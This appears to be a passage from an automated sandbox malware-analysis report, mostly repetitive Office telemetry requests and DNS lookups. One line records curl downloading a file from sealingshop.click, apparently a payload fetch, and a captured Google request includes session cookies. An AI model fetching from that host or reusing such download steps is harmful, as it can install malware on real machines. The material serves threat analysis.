Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /py/rose_tien HTTP/1.1Host: sealingshop.clickUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net

Source: global traffic	DNS traffic detected: DNS query: sealingshop.click
Source: global traffic	DNS traffic detected: DNS query: google.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ogs.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com

Source: unknown

HTTP traffic detected: POST /gen_204?s=webhp&t=cap&atyp=csi&ei=7TpQZ5ybCP7V7M8PhYbCIQ&rt=wsrt.6131,cbt.219,hst.103&opi=89978449&dt=&ts=300 HTTP/1.1Host: www.google.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"Content-Type: text/plain;charset=UTF-8sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.google.comX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX

Source: python.exe, 00000012.00000003.3202808995.0000012D51E77000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204009322.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202197981.0000012D520C0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3206731275.0000012D51FA5000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3199473048.0000012D51DF2000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202856613.0000012D51E84000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3198800218.0000012D520C0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202908008.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3203805160.0000012D523B3000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3203297988.0000012D52AF6000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3206731275.0000012D51FE3000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205916188.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3203373400.0000012D527F1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3203168656.0000012D51E90000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204623960.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp, _mode_ccm.cpython-39.pyc.16.dr	String found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
Source: python.exe, 00000012.00000003.3177289327.0000012D523BB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3182698577.0000012D523BB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3179926783.0000012D527F0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3178047469.0000012D527F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bugs.python.org)
